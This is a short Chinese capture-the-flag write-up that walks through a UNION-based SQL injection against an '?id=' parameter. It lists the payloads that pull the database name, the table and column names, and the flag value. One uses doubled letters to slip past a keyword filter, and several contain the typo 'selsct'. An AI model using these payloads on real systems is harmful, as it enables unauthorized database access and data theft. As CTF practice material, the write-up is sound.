斗宗强者恐怖如斯
构造payload
name:admin&passward:123
注入后得到如下页面
?id=-1') union selsct 1,2,3--+
?id=-1') union selsct 1,2,database()--+,爆数据库
?id=-1')union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='xitif_sql' --+,爆表名
?id=-1')union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag'--+
?id=-1')union select 1,2,group_concat(flAg) from xitif_sql.flag--+
得到flag